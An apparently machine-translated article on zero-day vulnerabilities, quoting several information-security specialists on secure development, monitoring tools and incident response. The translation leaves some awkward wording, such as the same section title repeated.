Zero-day vulnerabilities: How to deal with the unknown

[Father]

Table of contents

1. What is a zero-day vulnerability?
2. Where do zero-day vulnerabilities come from?
3. Preventive protection
4. Preventive protection
5. Responding to the exploitation of a zero-day vulnerability
6. Results

The "wild nature" of the information security world is saturated with a variety of "predators". Some of them are scary, but predictable and only threaten a narrow group of organizations. Others, on the contrary, have long been studied and reliably protected by almost all actors who have taken care of their cybersecurity.

But there is a risk that the information security-oriented Bigtech and the startup that was formed yesterday may not be ready for: these are zero-day vulnerabilities.

This article will analyze the reasons for the existence of 0-day vulnerabilities, the degree of their criticality for the functioning of companies, and possible methods of protecting against the exploitation of zero-day vulnerabilities.

What is a zero-day vulnerability?​

A zero-day vulnerability is a software or logical vulnerability of an information system that was discovered for the first time and, at the time of receiving information about this vulnerability by the company's specialists, they do not have a ready-made solution to protect against the exploitation of this vulnerability.

The main "weapon" of zero-day that distinguishes this group from other vulnerabilities is surprise and confusion. At the time of detection of the vulnerability, information security specialists and developers who protect the infrastructure find themselves in conditions of limited data: they only have a report from the researchers who discovered this vulnerability, and data from information security systems that are installed inside the infrastructure.

Evgeny Gryaznov
Leading information security consultant at R-Vision

To answer this question, first you need to decide on the terminology. From a development point of view, 0-day is no different from other vulnerabilities. But the special feature of 0-day is that the developer had 0 days to fix this vulnerability.
This means that security measures have not yet been created against it, and the software manufacturer itself learns about the vulnerability only when it begins to be actively exploited in customer systems, and in some cases much later. At the same time, from the moment the vulnerability became publicly known until the release and installation of fixes (patches), a sufficient amount of time may pass during which 0-day will be actively used by attackers to conduct attacks.
Since not every vulnerability poses a real risk, 0-day is usually also understood as vulnerabilities with a high CVSS (Common Vulnerability Scoring System) rating, in particular, those that allow remote code execution. To reduce their number, companies use secure development techniques (AppSec), such as fuzzing, static and dynamic analyzers. Special attention should be paid to timely updating of third-party dependencies and components in which 0-day can be found. A striking example is the well-known Log4j vulnerability.

The situation is further complicated by the fact that the "zero day" does not necessarily coincide with the day when the vulnerability was found and started to be exploited by intruders. There may be a situation when "defenders" start working on "closing a vulnerability" that has been used by hackers for months.

However, in most cases, the situation is not so critical for several reasons at once. First of all, because most zero-day vulnerabilities are detected and fixed at different stages of development and testing before launching the service.

Alexander Buravtsov
Director of Information Security at MyOffice

An effective way to reduce 0-day vulnerabilities is to use the Secure Development Principles (SSDLC) that we apply in our company. This approach significantly improves the quality of our products, as all stages of development are under control-from planning to release.
At the stage of creating a product architecture, SSDLC practices allow you to avoid using vulnerable architectural patterns and solutions. At the development stage, they provide security control for code and third-party libraries using specialized automated tools and allow you to fix vulnerabilities even before they are included in the main code base. In the process of getting binary artifacts and preparing a release, dynamic analysis, fuzzing, and engaging external teams of testers help identify and eliminate what was previously missed.
As a result, by releasing a product, we can guarantee its safety. Of course, nothing completely eliminates vulnerabilities, but in our experience, the SSDLC approach significantly reduces the number of potential errors.

SSDLC and security analysis do not guarantee that there are no "zero" vulnerabilities left in the infrastructure. But to search for them and detect them, attackers will have to have at least as much competence in the field of security analysis and pentest as those who conducted the verification and development. And there are very few such hackers, and most of them are members of APT groups.

The second reason that each new 0-day vulnerability does not become the "end of the world" for the service is that not all of them are really critical for the functioning of the infrastructure and directly lead to the implementation of invalid events.

And the third reason is the existence of a variety of detection and protection methods, including using information security tools that are focused on behavior analysis and anomaly detection, that is, they do not rely on information about previously known vulnerabilities, but look for markers of exploitation of previously undetected ones.

Dmitry Pudov
CEO of NGR Softlab

The list of such tools is quite extensive — from specialized solutions to various analytical tools that can help you respond in a timely manner to attempts to exploit 0-day or build an additional level of protection. At the same time, it is difficult to talk about a single tool in the context of 0-day vulnerabilities-rather, it is a set of tools that can help detect and respond to an attack in a timely manner at different stages of its development. For example, behavioral analytics systems or deception technologies can be useful. An equally important aspect is the readiness of the information security team to analyze the consequences of successful attacks, in order to collect the necessary attributes of the techniques used and then prevent their use.

Zero-day vulnerabilities are a rather dangerous phenomenon that can lead to serious consequences for the company and users of the affected service. However, it is important to understand that undetected vulnerabilities exist in absolutely all services and companies. If you realize this fact and systematically prepare for the fact that such a vulnerability will be identified, the risks will significantly decrease.

Where do zero-day vulnerabilities come from?​

As mentioned earlier, zero-day is the day when data about a vulnerability became known to the software developer. That is why the work of researchers who analyze the behavior of hacker groups and data from hacker forums is so important – information about a new vulnerability may appear there earlier than in the public field, before it is revealed by "white" researchers.

Alexander Novikov
Head of Research, Cyberanalytics and Development at T1 Group

When 0-day is found by a "black" hacker, it does not inform developers about it, and specialists do not know about the existence of the vulnerability, and therefore it cannot be taken into account in statistics.
An attacker can write code that allows you to take advantage of the vulnerability-an exploit. But it is not necessary that he will use it himself – he can sell it on the darknet, and, perhaps, in a private channel, which maximally reduces the number of people who know about the presence of a 0-day vulnerability.
In addition, once a network is penetrated, an attacker can either immediately attack, or lie low and wait for a more appropriate time – which can also increase the time interval between discovering a vulnerability and becoming aware of it.
When a white-hat hacker finds a vulnerability, they report it to the developer, who releases a software update that closes the vulnerability, and the information about it becomes publicly available.

If we talk about specific sources of origin of zero-day vulnerabilities, then there are two of them:

1. Natural. During product development, the specialists made a mistake or failed to predict the scenario of "inappropriate" exploitation of a particular code element. We can say that this is a human factor, the impact of which can be reduced by automation elements and the involvement of a large number of competent specialists, but it cannot be reduced to zero.
2. Artificial. This can include any deliberately made vulnerabilities, the appearance of which may be due to the selfish goals of a particular specialist, unfair competition or the intervention of other third parties.

Alexander Gerasimov
CISO Awillix

0-day vulnerabilities can be initially laid by some specialized structures to achieve their goals (espionage, smart data theft, etc.), or hackers have found clever attack vectors that are based on both low-level features and high-level ones.
There is no single prescription or cure for all attacks. As a tip — set up the infrastructure so that if necessary, you can both roll out a new update and roll back to the old version of your product that is not vulnerable to vulnerabilities; monitor information about vulnerabilities regularly and prevent the use of obviously vulnerable versions.

Also, the factor of technological progress is also important. Hacking resistance of resources and services that are no longer supported by the manufacturer and are not updated will decrease from year to year.

Based on the reasons for the appearance of zero-day vulnerabilities, we can deduce three stages of dealing with them:

1. Preventive. The entire set of actions to eliminate vulnerabilities before entering the public space.
2. Preventative. A set of checks, testing and analysis throughout the service's existence, in order to "get ahead" of attackers in identifying vulnerabilities.
3. Reactive. All actions of the team of specialists to respond and study the identified vulnerability, promptly "close" and release (install) an update patch that solves this problem.

Viktor Chashchin
Chief Operating Officer of the MULTI-FACTOR Company

It is not entirely correct to talk about reducing the number of zero-day vulnerabilities, because all the errors found at the very beginning are zero-day vulnerabilities, so you need to write code as bequeathed by the guidelines for writing secure applications, the same widely known OWASP.
In absolute numbers, of course, there are more identified vulnerabilities on the account of the "whites", if only simply because there are more of them, and they are constantly searching for code in their projects. Blacks are more likely to find atypical errors, because they often have to take a non-trivial approach to the task of penetrating the infrastructure under study.

At each stage or level of combating the exploitation of zero-day vulnerabilities, you can highlight your own practices and recommendations that can help the company both reduce the risks of detecting such a vulnerability by intruders and effectively respond to the detection of such an event.

Preventive protection​

Proactive protection begins with an awareness of the fact that no product in the digital environment is safe in principle. Accordingly, the more services a company uses, the more potential zero-day vulnerabilities they contain, and the higher the risks.

Accordingly, it makes sense to go through the list of IP systems with Occam's razor and abandon those that duplicate each other's functions and do not inspire confidence due to the development team (which is especially important in the context of a geopolitical crisis). or they simply don't perform critical functions.

If we consider this problem from the point of view of the developer of an information system or resource, then the first means of dealing with zero-day vulnerabilities (and many other information security problems) is the introduction of secure development practices (SSDLC approach).

Boris Larin
Cybersecurity Expert, Kaspersky Lab

The number of 0-day vulnerabilities and their possible effect can be reduced if you develop by adhering to the Secure Software Development Lifecycle (SSDLC) practices. One of the most common SSDLC models is MS SDL, developed by Microsoft.
The main stages of this model are:

• training all employees involved in the basics of secure development;
• identification of possible risks, threats, and methods of their mitigation at the design stage;
• code implementation according to the best practices of safe development (for example: prohibiting the use of unsafe methods, static code analysis before compilation);
• verification of compiled software code (for example: fuzzing, conducting pentests);
• prepare a response plan for previously unknown threats.

In addition, if the product is being developed from scratch, developers can choose to use more modern and Memory safe languages (for example, Rust, Go, etc.). Using such languages can not protect against all types of vulnerabilities, but it will save them from the most common vulnerabilities that can be affected. programming languages such as C and C++are affected.

A service that was originally created with the understanding that it will be hacked, and security gaps will inevitably be found, will initially be protected an order of magnitude better than the one created on the standard SDLC development cycle.

Preventive protection​

The preventive fight against zero-day vulnerabilities partially coincides with the preventive one and consists of three aspects::

• regular multi-format testing;
• use of information security tools that can help identify attacks using zero-day vulnerabilities;
• creating response regulations and working them out.

Kirill Romanov
Business Development Manager of the Information Security Department of Sissoft

Usually, development is divided into stages, each of which ends with a vulnerability check. If earlier verification was performed manually, now specialized programs, such as PT Application Inspector, are responsible for the process.
When the product is already ready and used in "combat" mode, you should think about using a "sandbox" that emulates the client's infrastructure. It helps you check what the sent file is doing and whether it is trying to run something bad. If so, it will be included in the block list and will not be able to harm the infrastructure.

Multiformat testing involves, first of all, regular internal and external security audits, attracting pentesters, redtiming, and accessing bugbounty programs.

If we talk about cybersecurity tools that can help protect against 0-day, it is important to understand that their adequate and effective functioning requires "first-hand" information security tools, such as firewalls, antivirus, mail traffic protection tools, traffic analyzers, and a number of others.

Ivan Chernov
UserGate Development Manager (Information security expert):

The current cyber threat landscape is so diverse and dynamic that the use of basic security tools alone is no longer a sufficient step towards building a fully protected infrastructure, even if only because of the existence of such a factor as a zero-day vulnerability. In order to "recognize it in person", you must also be hacked through it, so it is logical that at the moment it is impossible to cover yourself with a shield from malicious 0-day exploitation a priori, that's why it is zero, that is, it first appeared and has not yet been described by anyone.
However, there are preventive methods and approaches that can be used to detect traces of compromise and attempts to exploit even 0-day in time, reduce the penetration surface of the attack and stop it. The method is based on scrupulously analyzing data, searching for and finding significant events among them, identifying incidents and investigating them, so that the responsible persons (developers and information security specialists) can then correct or protect this vulnerability.
Specifically for the implementation of such a proactive and preventive concept, UserGate has developed its own tool-Log Analyzer security event monitoring.
LogAn combines the functionality of SIEM (Security Information and Event Management) and IRP (Incident Response Platform), which provides opportunities for collecting logs and events, searching for incidents and responding to them.
It is very important to understand that SIEM is a complex tool. And without a proper approach to the classification of knowledge, it will not give tangible benefits. However, a set of simple recommendations will allow you to start using LogAn, which also belongs to the SIEM class, and use it effectively from the very first days. We have even developed our own life hacks that allow us to turn the system from a complex one into a very convenient tool.

As applied to zero-day, systems and tools that focus on complex behavior analysis, targeting attack chains (event relationships), and searching for anomalies in certain infrastructure elements show the greatest effectiveness.

Also, in such cases, deception technologies are especially effective, which are aimed at provoking an attacker to perform a unmasking action. These technologies are not aimed at detecting HPE or hacking techniques, but at the usual human weaknesses that are inherent in hackers of any qualification.

Regarding regulations and working out actions on cyber polygons, their main advantage is debunking the unpredictability and ambiguity that often surround zero-day vulnerabilities. Of course, it is impossible to model the algorithm of actions for a specific situation of this kind, but working out universal actions can reduce the risk of mistakes due to haste or stress.

Responding to the exploitation of a zero-day vulnerability​

Within this section, three aspects are critical:

1. Awareness. Data about the 0-day vulnerability found will simply not reach the company if its specialists do not keep their finger on the pulse or, at least, do not read messages from the software supplier.
2. Patch management. It is important to understand that the first update from the vendor can either "close" the vulnerability or be ineffective. Or it may even "breed" several new holes or cause a failure in the entire service.
3. Readiness. If specialists have the experience of responding to cyber training, clear regulations, and a sufficient set of tools, it is highly likely that they will be able to minimize potential damage.

Evgeny Kravtsov
Senior Frontend Developer, SberDevices
0-day vulnerability protection tools can include:
- Network monitoring: tools that detect unexpected activity or anomalies that may indicate an attempt to exploit a 0-day vulnerability.
- Code injection protection: tools that prevent the introduction of unwanted code, such as protection against spam injections and buffer exploitation attacks.
- Data protection: Tools that protect data from unauthorized access or modification, such as data encryption.
- Antivirus programs: tools that detect and block malware that can be used to exploit 0-day vulnerabilities.

It is also important to keep in mind that exploiting a zero-day vulnerability, with a number of exceptions, does not entail the implementation of an invalid event. And, in most cases, SOC specialists have time to minimize the damage from the attack. Although, of course, a scenario with the exploitation of a high-level vulnerability of criticality is always possible, as happened with Log4Shell.

Results​

Zero – day vulnerabilities are not "god out of the machine" or a new phenomenon in cybersecurity. They have always existed, and they have acquired their "scary" color due to the fact that services are constantly being improved, as well as the level of cybersecurity expertise of companies. Therefore, hackers have to become particularly resourceful and look for particularly non-trivial ways to break into the infrastructure.

At the same time, the arsenal of dealing with such "black swans" is also growing, which is supplemented not only with new software solutions, but also with the experience of specialists during previous incidents, which reduces the degree of randomness in the SOC's response to an incident using zero-day vulnerabilities.

Also, it should be said that the only reliable way to deal with such vulnerabilities is to realize that the system or service is vulnerable exactly as long as it functions, which means that monitoring security in all possible ways should be an integral part of the company's information security policy.